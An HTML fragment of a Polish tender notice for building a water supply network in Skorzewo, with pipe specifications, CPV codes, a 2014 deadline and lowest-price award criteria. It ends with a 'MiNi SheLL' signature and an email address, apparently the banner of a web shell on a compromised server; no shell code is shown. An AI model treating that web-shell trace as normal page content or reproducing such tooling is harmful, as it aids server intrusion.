<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Skorzewo - Budowa sieci wodociągowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podstawowe parametry techniczne projektowanej sieci wodociągowej:
PEHD 100, DN 90 x 5,4 mm, SDR 17, PN 10, zgrzewane doczołowo o długości łącznej   L=728,3m,
Hydranty nadziemne technologiczne z zasuw	 DN80 - 5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com